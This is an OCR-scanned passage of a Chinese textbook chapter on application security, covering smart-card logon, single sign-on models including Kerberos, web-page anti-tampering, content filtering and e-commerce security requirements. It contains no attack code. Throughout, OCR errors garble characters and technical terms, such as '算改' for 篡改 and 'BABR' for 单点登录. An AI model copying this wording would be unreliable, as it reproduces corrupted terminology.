并 可 以 防止 被 自 改 ， 以 及 对 私 钥 进行 隔离 保护 。 智 能 卡 本 身 可 以 认为 是 一 个 具有 存储 和 
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处 理 功能 的 计算 机 。 将 智能 卡 插入 到 智能 卡 阅读 器 可 以 使 得 它 能 够 和 某 个 在 计算 机 上 所 
运行 的 程序 之 问 进行 通信 ， 数 据 通 信 的 接口 一 般 是 USB、RS232 或 PCMCIA 接口 。 

对 于 Windows 系统 的 交互 式 登录 ,涉及 到 Active Directory Kerberos 协 议和 公 铀 证 书 。 
一 个 使 用 智能 卡 交互 式 登录 以 某 个 用 户 将 它 的 智能 卡 插入 到 一 个 智能 卡 阅 读 器 中 开始 ， 
智能 卡 向 Windows 2000 发 信号 ， 提 示 用 户 输入 自己 的 个 人 标识 号 (PIN. Personal 
Identification Number)， 而 不 是 通常 的 用 户 名 ， 登 录 域 名 和 密码 。 将 智能 卡 插入 智能 阅读 
器 相当 在 Windows 中 启动 一 个 基于 密码 的 登录 过 程 。 用 户 所 提供 的 PIN 只 能 向 智能 卡 ， 
而 不 是 向 域 本 身 进 行 认 证 。 在 智能 卡 中 保存 的 公 钥 证 书 用 于 向 使 用 了 Kerberos 协议 和 相 
关 Pkinit 扩展 域 进行 认证 ，Kerberos 协议 的 Pkinit 扩展 允许 用 户 使 用 一 个 公 钥 证 书 而 不 
是 密码 来 进行 认证 。 在 用 户 输入 他 的 PIN 之 后 ，Windows 操作 系统 可 以 根据 用 户 所 提供 
的 两 个 标识 信息 一 一 他 的 智能 卡 和 PIN 来 确定 该 用 户 是 否 能 够 通过 认证 。 

2. BABR (SSO, Single Sign-On) 技术 

(1) 概述 

随 着 信息 化 的 迅猛 发 展 , 用 户 每 天 需要 登录 到 许多 不 同 的 信息 系统 , 如 网 络 、 邮 件 、 
数据 库 、 各 种 应 用 服务 器 等 。 每 个 系统 都 要 求 用 户 遵循 一 定 的 安全 策略 ， 比 如 要 求 输入 
用 户 ID 和 口令 。 随 着 用 户 需 要 登录 系统 的 增多 ， 出 错 的 可 能 性 就 会 增加 ， 受 到 非法 截 
获 和 破坏 的 可 能 性 也 会 增 大 ， 安 全 性 就 会 相应 降低 。 而 如 果 用 户 忘 记 了 口令 ， 不 能 执行 
任务 ， 就 需要 请 求 管理 员 的 帮助 ， 并 只 能 在 重新 获得 口令 之 前 等 待 ， 造 成 了 系统 和 安全 
管理 资源 的 开销 ， 降 低 了 生产 效率 。 特 别 是 新 系统 的 涌现 ， 在 与 已 有 系统 的 集成 或 融合 
上 ， 特 别 是 针对 相同 的 用 户 群 ， 会 带 来 以 下 的 问题 ; 

D 如 果 每 个 系统 都 开发 各 自 的 身份 认证 系统 将 造成 资源 的 浪费 ， 消 耗 开 发 成 本 ， 
并 延缓 开发 进度 ; 

@ 多 个 身份 认证 系统 会 增加 整个 系统 的 管理 工作 成 本 ; 

@ 用 户 需 要 记忆 多 个 账户 和 口令 ， 使 用 极为 不 便 ， 同 时 由 于 用 户口 令 遗 忘 而 导致 
的 支持 费用 不 断 上 涨 ; 

@ 无 法 实现 统一 认证 和 授权 ， 多 个 身份 认证 系统 使 安全 策略 必须 逐个 在 不 同 的 系 
统 内 进行 设置 ， 因 而 造成 修改 策略 的 进度 可 能 跟 不 上 策略 的 变化 ; 

© 无 法 统一 分 析 用 户 的 应 用 行为 ; 因此 ， 对 于 有 多 个 业务 系统 应 用 需求 的 政府 、 
企业 或 机 构 等 ， 需 要 配置 一 套 统一 的 身份 认证 系统 ， 以 实现 集中 统一 的 身份 认证 ， 并 减 
少 整个 系统 的 成 本 。 

单 点 登录 系统 的 目的 就 是 为 这 样 的 应 用 系统 提供 集中 统一 的 身份 认证 ， 实 现 “ 一 点 
登录 、 多 点 漫游 ”的 目标 ， 方 便 用 户 使 用 。 广 义 的 “ 单 点 登录 ”包含 的 范围 很 广 ， 用 户 
可 能 访问 的 系统 包括 主机 系统 、Windows 程序 、Unix 系统 、Web 应 用 等 等 。 在 这 些 不 同 
范围 的 应 用 程序 对 安全 的 实现 都 有 不 同 的 侧重 点 。 

单 点 登录 系统 采用 基于 数字 证 书 的 加 密 和 数字 签名 技术 ， 基 于 统一 的 策略 的 用 户 身 
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份 认 证 和 授权 控制 功能 ， 对 用 户 实行 集中 统一 的 管理 和 身份 认证 ， 以 区 别 不 同 的 用 户 和 
信息 访问 者 ， 并 作为 各 应 用 系统 的 统一 登录 入 口 ， 同 时 为 通过 身份 认证 的 合法 用 户 签发 
针对 各 个 应 用 系统 的 登录 票据 ， 从 而 实现 “一 点 登录 、 多 点 漫游 ”必要 时 ， 单 点 登录 系 
统 能 够 与 统一 权限 管理 系统 实现 无 颖 结合 ， 签 发 合法 用 户 的 权限 票据 ， 从 而 能 够 使 合法 
用 户 进入 其 权限 范围 内 的 各 应 用 系统 ， 并 完成 符合 其 权限 的 操作 。 

(2) 单 点 登录 需求 

从 用 户 的 视角 看 ， 一 个 理想 的 单 点 登录 系统 应 该 具备 以 下 两 个 特点 : 

© 在 复杂 的 企业 应 用 环境 中 ， 也 不 会 影响 到 诸如 业务 过 程 ， 响 应 效率 ， 网 络 吞 吐 
量 等 事情 ， 并 将 互 操作 性 方面 的 问题 减 至 最 少 ， 任 何事 情 都 在 顺利 工作 。 

© 当 一 个 单 点 登录 系统 被 加 入 使 有 用， 迁移 应 该 容易 。 所 有 的 用 户 能 够 立即 学 会 使 
用 这 个 工具 。 

从 管理 员 的 角度 看 ， 一 个 理想 的 系统 也 应 该 具备 以 下 两 个 特点 : 

© 计算 和 网 络 环境 在 各 个 方面 必须 能 被 管理 ， 而 管理 应 该 不 引起 额外 的 工作 或 安 
全 漏洞 。 管 理 过 程 应 该 适合 组 织 的 结构 和 政策 。 这 意味 着 权利 和 控制 需要 有 一 定 的 层次 
结构 。 

@ 认证 和 用 法 的 方法 应 能 在 分 布 式 的 组 织 环境 中 得 到 全 部 的 贯彻 而 不 用 付出 额外 
的 努力 。 所 有 的 应 用 程序 ， 无 论 新 旧 ， 可 以 不 需要 或 只 需 很 少 的 改动 即 可 适应 新 的 认证 
Ti. 

G) 实现 难点 

但 是 在 实际 应 用 中 ， 一 些 理论 上 不 错 的 方案 却 在 实际 中 无 法 实现 ， 这 里 总 结 三 个 主 
要 的 方面 : 计算 环境 相关 的 问题 ; 组织 结构 的 问题 和 电子 身份 认证 方法 的 问题 。 

@ 与 计算 环境 相关 的 问题 

当前 计算 机 环境 的 主要 问题 是 ， 很 少 有 系统 在 进行 安全 设计 的 时 候 参考 了 那些 普遍 
通用 的 认证 方法 。 所 以 当 新 的 系统 实现 了 自己 的 认证 和 访问 控制 后 ， 与 旧 有 的 认证 和 访 
问 控制 机 制 毫 无 什么 互 操作 性 可 言 。 

在 所 有 的 安全 解决 方案 里 “信任 ”是 主要 的 元 素 。 不 幸 的 是 ， 当 前 的 计算 机 系统 不 
能 被 信任 。 它 们 要 么 有 严重 的 安全 漏洞 和 错误 ， 要 么 不 能 经 受 恶意 攻击 。 在 这 些 不 可 靠 
的 部 件 上 运行 安全 软件 ， 构 筑 安 全 的 平台 ， 是 一 个 挑战 。 

另外 一 个 问题 是 ， 系 统管 理 员 往往 对 复杂 的 网 络 环境 中 所 有 的 服务 和 配置 缺乏 足够 
的 认识 。 

© 与 组 织 结构 相关 的 问题 

访问 授权 的 规则 需要 规定 哪些 资源 是 个 体 用 户 可 以 或 不 能 访问 的 。 当 用 户 转移 到 别 
的 部 门 ， 那 么 他 的 访问 控制 的 权限 也 应 得 到 及 时 的 反映 。 尤 其 在 一 些 基于 小 组 进行 活动 
的 组 织 中 ,工作 上 的 频繁 变动 时 有 发 生 ， 但 是 ， 部 门 中 组 与 组 间 的 界定 ， 往 往 是 模糊 的 。 
这 样 当 有 组 织 结构 上 的 模糊 与 计算 机 环境 的 繁复 相 结合 时 ， 显 然 系统 安全 主管 必须 应 付 
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一 个 异常 复杂 的 情况 。 

© 与 电子 身份 相关 的 问题 

登录 到 一 个 系统 的 基础 是 电子 身份 的 认证 。 基 本 上 每 种 解决 方案 都 有 一 些 利 次 存 
在 。 传 统 的 方式 也 是 运用 最 为 广泛 的 是 基于 口令 的 认证 。 而 这 种 方式 的 弱点 是 被 猜测 和 
监听 。 甚 至 有 很 多 口令 被 记 在 笔记 本 上 或 就 在 计算 机 附近 。 对 于 口令 认证 的 改进 是 一 次 
性 口令 。 顾 名 思 义 ， 仅 使 用 一 次 性 的 口令 ， 可 以 极 大 地 降低 监听 带 来 的 危险 。 电 子 身份 
也 可 以 基于 智能 卡 ， 或 加 密 算法 如 RSA。 卡 和 私 钥 将 被 口令 加 密 保 护 。 

一 旦 实施 了 安全 认证 ， 下 一 个 挑战 是 使 每 个 系统 接受 一 样 电子 的 身份 。 为 用 户 产 生 
凭证 并 且 自 动 地 把 它 传递 给 所 有 需要 的 服务 。 这 是 可 能 需要 实现 的 最 艰巨 的 部 分 。 

(4) 几 种 常用 的 单 点 登录 模型 

自 2000 年 以 来 ， 不 同 厂商 推出 的 单 点 登录 有 不 同 的 实现 方法 和 模型 结构 ， 下 面 介 
绍 几 种 常用 的 模型 : 

®© 基于 网 关 的 SSO 模型 

如 图 5-1 所 示 ， 该 模型 由 三 部 分 组 成 : 支持 认证 服务 的 客户 端 ， 认 证 服务 器 ， 支 持 
认证 服务 的 应 用 程序 服务 器 。 其 中 认证 服务 器 扮演 经 纪 人 的 角色 ， 所 有 的 认证 服务 都 由 
它 来 完成 。 基 本 思想 是 : 所 有 客户 机 在 访问 系统 资源 之 前 首先 向 认证 服务 器 进行 身份 验 
证 ， 同 样 为 了 提高 系统 的 安全 性 相互 认证 的 方式 。 当 用 户 通 过 身份 验证 后 ， 认 证 服务 器 
返回 给 用 户 一 个 电子 身份 标识 ， 用 户 通过 该 电子 身份 标识 去 访问 其 他 的 应 用 服务 器 ， 从 
而 实现 单 点 登录 。 如 果 电 子 身份 非法 或 者 过 期 ， 则 应 用 服务 器 会 拒绝 提供 服务 。 
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图 5-1 基于 网 关 的 SSO 模型 


@ 基于 验证 代理 的 SSO 模型 

如 图 5-2 所 示 ， 在 基于 代理 人 的 解决 方案 中 ， 有 一 个 自动 地 为 不 同 的 应 用 程序 认证 
用 户 身 份 的 代理 程序 。 这 个 代理 程序 需要 设计 有 不 同 的 功能 。 比 如 ， 它 可 以 使 用 口令 表 
或 加 密 密 钥 来 自动 地 将 认证 的 负担 从 用 户 移 开 。 代 理 人 也 被 放 在 服务 器 上 面 ， 在 服务 器 
的 认证 系统 和 客户 端 认 证 方法 之 间 充 当 一 个 “翻译 ”。 
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图 5-2 基于 验证 代理 的 SSO 模型 


(3) 基于 Kerberos 的 SSO 模型 

Kerberos 是 标准 网 络 身份 认证 协议 ， 该 协议 是 由 麻 省 理工 学 院 起 草 ， 旨 在 给 计算 机 
网 络 提供 “身份 认证 ” 它 是 基于 信任 第 三 方 , 如 同一 个 经 纪 人 集中 地 进行 用 户 认 证 和 发 
放电 子 身份 标识 。 它 提供 了 在 开放 型 网 络 中 进行 身份 认证 的 方法 ， 认 证 实体 可 以 是 用 户 
或 用 户 服务 。 这 种 人 为 不 依赖 宿主 机 的 操作 系统 或 主机 的 IP 地 址 , 不 需要 保证 网 络 上 所 
有 的 物理 安全 性 , 并 且 假 定数 据 包 在 传输 中 可 被 随机 窃取 自 改 。 在 用 户 初始 登录 成 功 后 ， 
其 密 钥 和 身份 标识 信息 会 长 期 保存 在 内 存 中 ， 当 以 后 要 申请 新 的 票据 〈 新 的 应 用 服务 ) 
时 ， 系 统 会 自动 提取 之 ， 加 密 后 传送 出 去 ， 整 个 过 程 对 于 用 户 来 说 完全 是 透明 的 ， 在 不 
再 需要 用 户 输入 任何 口令 的 情况 下 实现 用 户 身份 的 自动 传递 。 认 证 过 程 如 图 5-3 所 示 。 
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图 5-3 ”基于 Kerberos 的 SSO 模型 
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此 模型 的 技术 原理 是 : 采用 对 称 密 钥 加 密 算法 对 信息 进行 加 密 ， 如 果 用 某 个 用 户 的 
密 钥 加 密 某 一 信息 ， 那 么 只 有 该 用 户 才能 解密 。 因 此 ， 通 过 解密 也 可 以 证 明 该 用 户 的 合 
法 性 ( 即 为 密 钥 的 拥有 者 )。Kerberos 协议 中 有 三 个 通信 参与 方 ， 需 要 认证 身份 的 通信 双 
方 和 一 个 双方 都 信任 的 第 三 方 KDC〈 密 钥 分 发 中 心 )， 将 发 起 认证 服务 的 一 方 称 为 客户 
方 ， 客 户 方 需要 访问 的 对 象 称 为 服务 器 方 。 在 Kerberos 中 客户 方 是 通过 向 服务 器 方 递交 
自己 的 “票据 ”(Ticket) 来 证 明 自己 的 身份 的 ， 该 票据 是 由 KDC 专门 为 客户 方 和 服务 
器 方 在 某 一 阶段 内 通信 而 生成 的 。Kerberos 认证 服务 器 KDC 维护 着 一 个 数据 库 ， 包 括 
所 有 用 户 及 应 用 服务 器 的 密 钥 。 用 户 的 密 钥 是 基于 口令 的 ， 只 存在 于 KDC 上 ， 用 户 首 
次 注册 时 ， 系 统 根据 用 户 输入 的 口令 经 过 散 列 Hash 可 以 生成 密 钥 ， 应 用 服务 器 向 KD 
注册 时 也 会 生成 密 钥 ， 该 密 钥 不 仅 存 在 于 KDC 上 ， 还 保存 在 该 服务 器 所 贮 的 主机 上 ， 
这 些 密 钥 往往 是 机 器 随机 生成 。 用 户 与 应 用 服务 器 之 间 进 行 通信 时 ， 二 者 之 间 还 共享 一 
个 临时 会 话 密 钥 ， 可 根据 需要 加 密 数据 。 该 密 钥 在 KDC 认证 用 户 时 产生 并 分 发 给 通信 
双方 。 会 话 密 钥 仅 在 当前 会 话 期 间 有 效 ， 过 期 需要 重新 申请 。 
5.1.2.2 ”网 页 防 算 改 技术 

现在 从 政府 到 地 方 ， 涉 及 到 的 办 公 和 领域 ， 都 有 自己 的 网 站 。 虽 然 目 前 已 有 防火 墙 、 
入 侵 检测 等 安全 防范 手段 , 但 各 类 Web 应 用 系统 的 复杂 性 和 多 样 性 导致 系统 漏洞 层 出 不 
穷 、 防 不 胜 防 ， 黑 客 入 侵 和 算 改 页 面 的 事件 时 有 发 生 。 针 对 这 些 情况 ， 网 页 防 算 改 系统 
应 运 而 生 。 经 过 多 年 的 发 展 ， 网 页 防 算 改 系统 采用 的 技术 也 在 不 断 地 发 展 和 更 新 ， 目 前 
市 场 上 常见 的 网 页 防 算 改 技术 有 以 下 三 种 : 

1. 时 间 轮 询 技术 

时 间 轮 询 技术 〈 也 可 称 为 “外 挂 轮 询 技术 ”。 该 技术 作为 一 种 自动 化 的 技术 形式 出 
现 ， 从 而 摆脱 了 以 人 力 检测 恢复 为 主体 的 原始 手段 。 

时 间 轮 询 技术 是 利用 一 个 网 页 检测 程序 ， 以 轮 询 方式 读 出 要 监控 的 网 页 ， 与 真实 网 
页 相 比较 ， 来 判断 网 页 内 容 的 完整 性 ， 对 于 被 算 改 的 网 页 进行 报警 和 恢复 。 

但 是 ， 采 用 时 间 轮 询 式 的 网 页 防 自 改 系统 ， 对 每 个 网 页 来 说 ， 轮 询 扫描 存在 着 时 间 
间隔 ， 一 般 为 数 十 分 钟 ， 在 这 数 十 分 钟 的 间隔 中 ， 黑 客 可 以 攻击 系统 并 使 访问 者 访问 到 
被 算 改 的 网 页 。 

此 类 应 用 在 过 去 网 页 访问 量 较 少 ， 具 体 网 页 应 用 较 少 的 情况 下 适用 ， 目 前 网 站 页 面 
通常 少 则 上 百 页， 检测 轮 巡 时 间 更 长 ， 且 占用 系统 资源 较 大 ， 该 技术 逐渐 被 淘汰 。 

2. 核心 内 肉 技 术 十 事件 触发 技术 

所 谓 事件 触发 技术 就 是 利用 操作 系统 的 文件 系统 或 驱动 程序 接口 ， 在 网 页 文件 的 被 
修改 时 进行 合法 性 检查 ， 对 于 非法 操作 进行 报警 和 恢复 。 

所 谓 核心 内 嵌 技 术 即 密码 水 印 技术 。 该 技术 将 自 改 检测 模块 内 嵌 在 Web 服务 器 软件 
里 ， 它 在 每 一 个 网 页 流出 时 都 进行 完整 性 检查 ， 对 于 自 改 网 页 进行 实时 访问 阻 断 ， 并 了 予 
以 报警 和 恢复 。 最 初 先 将 网 页 内 容 采 取 非 对 称 加 密 存 放 ， 在 外 来 访问 请 求 时 将 经 过 加 密 
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验证 过 的 ， 进 行 解密 对 外 发 布 ， 若 未 经 过 验证 ， 则 拒绝 对 外 发 布 ， 调 用 备份 网 站 文件 进 
行 验 证 解密 后 对 外 发 布 .此 种 技术 通常 要 结合 事件 触发 机 制 对 文件 的 部 分 属性 进行 对 比 ， 
如 大 小 ， 页 面 生 成 时 间 等 做 判断 ， 无 法 更 准确 地 进行 其 他 属性 的 判断 。 其 最 大 的 特点 就 
是 安全 性 相对 外 挂 轮 巡 技术 安全 性 大 大 提高 ,但 不 足 是 加 密 计 算 会 占用 大 量 服务 器 资源 ， 
系统 反应 较 慢 。 

核心 内 嵌 技 术 避 免 了 时 间 轮 巡 技 术 的 轮 巡 间隔 这 个 缺点 。 但 是 由 于 这 种 技术 是 对 每 
个 流出 网 页 都 进行 完整 检查 ， 占 用 巨大 的 系统 资源 ， 给 服务 器 造成 较 大 负载 。 且 对 网 页 
正常 发 布 流程 作 了 更 改 ， 整 个 网 站 需要 重新 架构 ， 增 加 新 的 发 布 服务 器 替代 原先 的 服 
务 器 。 

3. 文件 过 滤 驱 动 技术 十 事件 触发 技术 

文件 过 滤 驱 动 技术 的 最 初 应 用 于 军 方 和 保密 系统 ， 作 为 文件 保护 技术 和 各 类 审计 技 
术 ， 甚 至 被 一 些 狭 独 好 事 者 应 用 于 “流氓 软件 ” 该 技术 可 以 说 是 让 人 喜忧参半 。 在 网 页 
防 算 改 技术 革新 当中 ， 该 技术 找到 了 其 发 展 的 空间 。 其 原理 是 : 将 算 改 监测 的 核心 程序 
通过 微软 文件 底层 驱动 技术 应 用 到 Web 服务 器 中 , 通过 事件 触发 方式 进行 自动 监测 ， 对 
文件 夹 的 所 有 文件 内 容 , 对 照 其 底层 文件 属性 , 经 过 内 置 散 列 快速 算法 , 实时 进行 监测 ， 
若 发 现 属性 变更 ， 通 过 非 协 议 方式 ， 纯 文件 安全 拷贝 方式 将 备份 路 径 文 件 夹 内 容 找 贝 到 
监测 文件 夹 相 应 文件 位 置 ， 通 过 底层 文件 驱动 技术 ， 整 个 文件 复制 过 程 毫 秒 级 ， 使 得 公 
众 无 法 看 到 被 算 改 页 面 ， 其 运行 性 能 和 检测 实时 性 都 达到 最 高 的 水 准 。 

页 面 防 算 改 模块 采用 Web 服务 器 底层 文件 过 滤 驱 动 级 保护 技术 , 与 操作 系统 紧密 结 
合 ， 所 监测 的 文件 类 型 不 限 ， 可 以 是 一 个 HTML 文件 也 可 以 是 一 段 动 态 代码 ， 执 行 准确 
率 高 。 这 样 做 不 仅 完全 杜绝 了 轮 询 扫 描 式 页 面 防 算 改 软件 的 扫描 间隔 中 被 算 改 内 容 被 用 
户 访问 的 可 能 , 其 所 消耗 的 内 存 和 CPU 占用 率 也 远 远 低 于 文件 轮 询 扫描 式 或 核心 内 嵌 式 
的 同类 软件 。 可 以 说 是 一 种 简单 、 高 效 、 安 全 性 又 极 高 的 一 种 防 算 改 技术 。 
5.1.2.3 WEB 内 容 安全 

当 安 全 威胁 打通 了 内 容 “ 经 脉 ” 企业 面临 的 不 仅 是 病毒 散播 、 恶 意 攻 击 等 安全 问 
题 ， 而 是 企业 内 部 重要 信息 的 泄密 与 丢失 。 内 容 安 全 的 管理 必须 依靠 三 大 技术 支撑 ， 即 
电子 邮件 过 滤 、 网 页 过 滤 、 反 间谍 软件 。 

内 容 安全 管理 技术 能 够 监控 和 管理 人 们 对 互联 网 资源 的 访问 以 及 相互 之 间 的 电子 
邮件 通信 ， 涉 及 范围 广泛 。 内 容 安全 管理 技术 可 以 细 分 为 电子 邮件 过 滤 、 网 页 过 滤 、 反 
间谍 软件 三 大 技术 ， 这 三 大 技术 不 仅 对 内 容 安全 市 场 发 展 起 到 决定 性 推动 作用 ， 而 且 对 
于 互联 网 的 安全 起 到 至 关 重 要 的 保障 作用 。 

1. 电子 邮件 过 滤 技 术 

对 企业 而 言 ， 电 子 邮 件 过滤 系 统 作为 一 项 满足 管理 需求 的 重要 手段 ， 已 成 为 网 络 监 
控 、 管 理 的 必 选 项 。 

电子 邮件 过 滤 能 够 确保 企业 最 佳 生产 效率 ， 降 低 网 络 、 邮 件 服务 器 和 存储 环境 被 垃 
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圾 、 恶 意 邮件 充斥 的 可 能 性 ， 防 止 以 财务 获取 为 目的 病毒 攻击 。 此 外 ， 电 子 邮件 使 用 者 
不 仅 能 向 IT 系统 传播 病毒 、 散 布 垃圾 邮件 ， 还 能 在 有 意识 或 无 意识 的 情况 下 ， 将 公司 的 
知识 产权 内 容 以 及 违背 隐私 、 贸 易 惯 例 和 公司 规则 的 信息 内 容 通 过 电子 邮件 的 形式 发 送 
给 竞争 对 手 或 无 意 接收 这 些 信息 的 人 ， 电 子 邮 件 过 滤 能 够 使 企业 规避 这 种 法 律 风险 。 

可 以 预见 ， 未 来 电子 邮件 过 滤 技 术 将 会 融入 更 多 综合 信息 安全 内 容 。 一 方面 ， 反 垃 
圾 邮件 将 继续 成 为 网 络 安全 解决 方案 中 的 重要 组 成 部 分 ， 另 一 方面 ， 内 容 过 滤 工具 会 更 
多 地 被 应 用 于 过 滤 向 外 发 送 的 沟通 请 求 ， 以 对 政策 执行 、 法 规 遵 从 和 不 良 内 容 进行 更 好 
控制 。 

2. 网 页 过 滤 技 术 

从 发 展 初期 的 单纯 以 预防 员工 访问 与 工作 无 关 的 网 页 地 址 而 影响 工作 效率 为 目的 ， 
网 页 过 滤 已 经 发 展 成 为 了 能 够 满足 全 球 商业 网 络 的 复杂 安全 需求 的 综合 过 滤 解 决 方案 。 
当前 的 网 页 过 滤 解 决 方案 能 够 提供 更 成 熟 的 架构 和 更 细 化 的 分 类 ， 且 过 滤 的 选项 也 不 是 
简单 的 “同意 ”或 “拒绝 ”。 

随 着 企业 架构 式 发 展 ， 商 业 网 络 日 益 复杂 化 ， 下 一 代 网 页 过 滤 解 决 方案 的 设计 ， 必 
须 能 够 解决 企业 所 面 对 的 一 系列 网 络 干扰 和 挑战 。 这 些 问题 包括 : 日 益 增 多 的 网 络 病毒 、 
恶意 代码 及 “惩罚 性 攻击 ” 符合 用 户 习 惯 的 流 媒 体 、 即 时 消息 及 端 到 端 等 协议 ; 未 经 授 
权 使 用 的 免费 或 共享 软件 等 。 

3. 反 间 谍 软 件 

目前 ， 间 谍 软 件 已 成 为 影响 企业 运营 安全 的 巨大 隐患 。 无 论 合法 还 是 非 合法 间谍 软 
件 都 能 隐蔽 安装 的 可 执行 程序 ， 对 个 人 和 企业 进行 监视 ， 并 向 其 控制 者 发 送 所 得 信息 。 

表面 上 看 ， 间 谍 软 件 也 许 只 表现 为 自动 弹出 广告 框 ， 但 实际 上 它 能 够 跟踪 用 户 在 线 
行为 ， 监 视 用 户 一 切 点 击 、 按 键 行为 ， 通 过 电子 邮件 内 容 盗 取 、 硬 盘 文 档 扫 描 及 改变 系 
统 和 登记 注册 设置 等 行为 使 得 用 户 身份 被 破解 、 数 据 遭 损坏 、 甚 至 企业 机 密 交 易 信息 丢 
失 ， 祸 害 企业 整个 网 络 。 

从 系统 管理 员 的 角度 来 说 ， 间 谍 软 件 会 造成 系统 速度 下 降 ， 增 加 沟通 成 本 。 从 企业 
角度 看 ， 间 谍 软 件 能 够 在 轻微 网 络 堵塞 的 伪装 下 轻易 穿 透 企业 防火 墙 。 一 旦 在 企业 内 网 
中 隐藏 下 来 ， 间 谍 软 件 就 开始 为 实现 它 的 创建 目的 而 活动 起 来 ， 将 所 有 敏感 信息 传 回 给 
其 制造 者 ， 为 系统 管理 带 来 负担 。 

针对 反 间 谍 软 件 危 害 性 ， 应 从 三 方面 加 以 防范 。 一 是 预防 ， 阻 止 间 谍 软 件 程序 进入 
计算 机 系统 ， 二 是 设置 障碍 ， 在 下 载 程序 中 设置 障碍 并 防止 它们 向 外 发 送信 息 ; 三 是 杀 
毒 : 清除 系统 中 所 有 的 间谍 软件 ， 不 过 这 是 一 项 艰巨 工作 。 由 于 很 多 间谍 软件 与 免费 程 
序 捆 绑 在 一 起 ， 这 些 免 费 程序 在 失去 间谍 软件 部 分 后 也 许 就 无 法 再 运行 。 因 此 简单 地 外 
载 程序 并 不 能 解决 这 个 问题 。 要 将 间谍 软件 彻底 地 从 系统 中 删除 ， 需 要 对 它 的 特质 、 依 
存 的 环境 和 应 用 关系 有 深入 的 了 解 。 
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52 电子 商务 安全 
5.2.1 电子 商务 安全 概论 


5.2.1.1 概念、 特点 

电子 商务 的 一 个 重要 技术 特征 是 利用 IT 技术 来 传输 和 处 理 商 业 信息 。 因 此, 电子 商 
务 安全 从 整体 上 可 分 为 两 大 部 分 : 网 络 安全 和 商务 交易 安全 。 

网 络 安全 的 内 容 包 括 : 网 络 设备 安全 、 网 络 系统 安全 、 数 据 库 安全 等 。 其 特征 是 针 
对 网 络 本 身 可 能 存在 的 安全 问题 ， 实 施 网 络 安全 增强 方案 ， 以 保证 网 络 自身 的 安全 为 目标 。 

商务 交易 安全 则 紧 紧 围绕 传统 商务 在 互联 网 络 上 应 用 时 产生 的 各 种 安全 问题 ， 在 网 
络 安全 的 基础 上 ， 保 障 以 电子 交易 和 电子 支付 为 核心 的 电子 商务 过 程 的 顺利 进行 。 即 实 
现 电 子 商务 的 保密 性 、 完 整 性 、 可 认证 性 、 不 可 拒绝 性 、 不 可 伪造 性 和 不 可 抵赖 性 。 

网 络 安全 与 商务 交易 安全 实际 上 是 密 不 可 分 的 ， 两 者 相辅相成 ， 缺 一 不 可 。 没 有 网 
络 安全 作为 基础 ， 商 务 交 易 安全 就 犹如 空中 楼 阁 ， 无 从 谈 起 。 没 有 商务 交易 安全 保障 ， 
即使 网 络 本 身 再 安全 ， 仍 然 无 法 达到 电子 商务 所 特有 的 安全 要 求 。 电 子 商 务 安全 是 以 网 
络 安全 为 基础 的 。 

但 是 ， 电 子 商 务 安全 与 网 络 安全 又 是 有 区 别 的 。 

首先 ， 网 络 不 可 能 绝对 安全 ， 在 这 种 情况 下 ， 还 需要 运行 安全 的 电子 商务 。 其 次 ， 
即使 网 络 绝对 安全 ， 也 不 能 保障 电子 商务 的 安全 。 电 子 商务 安全 除了 基础 要 求 之 外 ， 还 
有 特殊 要 求 。 

电子 商务 安全 具有 如 下 四 大 特性 : 

(1) 电子 商务 安全 是 一 个 系统 概念 

电子 商务 安全 问题 不 仅仅 是 个 技术 性 的 问题 ， 更 重要 的 是 管理 问题 ， 而 且 它 还 与 社 
会 道德 、 行 业 管 理 以 及 人 们 的 行为 模式 都 紧密 地 联系 在 一 起 。 

(2) 电子 商务 安全 是 相对 的 

安全 是 相对 的 ， 而 不 是 绝对 的 ， 要 想 以 后 的 网 站 永远 不 受 攻击 、 不 出 安全 问题 是 不 
可 能 的 。 

(3) 电子 商务 安全 是 有 代价 的 

对 于 电子 商务 的 具体 应 用 ， 如 果 不 直 接 牵涉 到 支付 等 敏感 问题 ， 对 安全 的 要 求 就 可 
以 低 一 些 ;， 如 果 牵 涉 到 支付 问题 ， 对 安全 的 要 求 就 要 高 一 些 ， 所 以 安全 是 有 成 本 和 代价 
的 。 作 为 一 个 经 营 者 ， 应 该 综合 考虑 这 些 因 素 ; 作为 安全 技术 的 提供 者 ， 在 研发 技术 时 
也 要 考虑 到 这 些 因 素 。 

(4) 电子 商务 安全 是 发 展 的 、 动 态 的 

今天 安全 ， 明 天 就 不 一 定安 全 ， 因 为 网 络 的 攻防 是 此 消 彼 长 、 道 高 一 尺 魔 高 一 丈 的 


第 5 章 应 用 系统 安全 基础 


事情 ， 尤 其 是 安全 技术 ， 它 的 敏感 性 、 竞 争 性 以 及 对 抗 性 很 强 ， 需 要 不 断 地 检查 、 评 估 
和 调整 相应 的 安全 策略 。 没 有 一 劳 永 逸 的 安全 ， 也 没有 一 跳 而 就 的 安全 。 
S.2.1.2 ”安全 需求 

由 于 Intemet 本 身 的 开放 性 以 及 目前 网 络 技术 发 展 的 局 限 性 ， 使 网 上 交易 面临 着 种 
种 安全 性 威胁 ， 也 由 此 提出 了 相应 的 安全 控制 要 求 。 

(1) 交易 实体 身份 可 认证 性 需求 

认证 性 (Authentication) 是 指 网 络 两 端的 使 用 者 在 沟通 之 前 互相 确认 对 方 的 身份 。 
在 进行 网 上 交易 时 ， 如 果 不 采取 任何 新 的 保护 措施 ， 容 易 引 起 假冒 、 诈 骗 等 违法 活动 。 
例如 ， 在 进行 网 上 购物 时 ， 对 于 客户 来 说 ， 需 要 确认 商家 的 身份 ; 同样 ， 对 于 商家 来 说 ， 
也 需要 确认 客户 的 身份 。 

因此 ， 电 子 交易 的 首要 安全 需求 就 是 要 保证 身份 的 可 认证 性 。 这 就 意味 着 ， 在 双方 
进行 交易 前 ， 首 先 要 能 确认 对 方 的 身份 ， 要 求 交易 双方 的 身份 不 能 被 假冒 或 伪装 。 

(2) 信息 保密 性 的 需求 

保密 性 (Confidentiality〉 是 指 信息 在 传送 或 存储 的 过 程 中 不 被 他 人 窃取 、 不 被 泄露 
或 披露 给 未 经 授权 的 人 或 组 织 ， 或 者 经 过 加 密 伪装 后 ， 使 未 经 授权 者 无 法 了 解 其 内 容 。 

电子 商务 是 建立 在 一 个 开放 的 网 络 环境 下 ， 当 交易 双方 交换 信息 时 ， 如 果 不 采取 适 
当 的 保密 措施 ， 那 么 其 他 人 就 有 可 能 知道 他 们 的 通信 内 容 ; 另外， 存储 在 网 络 的 文件 信 
息 如 果 不 加 密 的 话 ， 也 有 可 能 被 黑客 窃取 。 

因此 ， 电 子 商务 另 一 个 重要 的 安全 需求 就 是 信息 的 保密 性 。 这 意味 着 ， 一 定 要 对 敏 
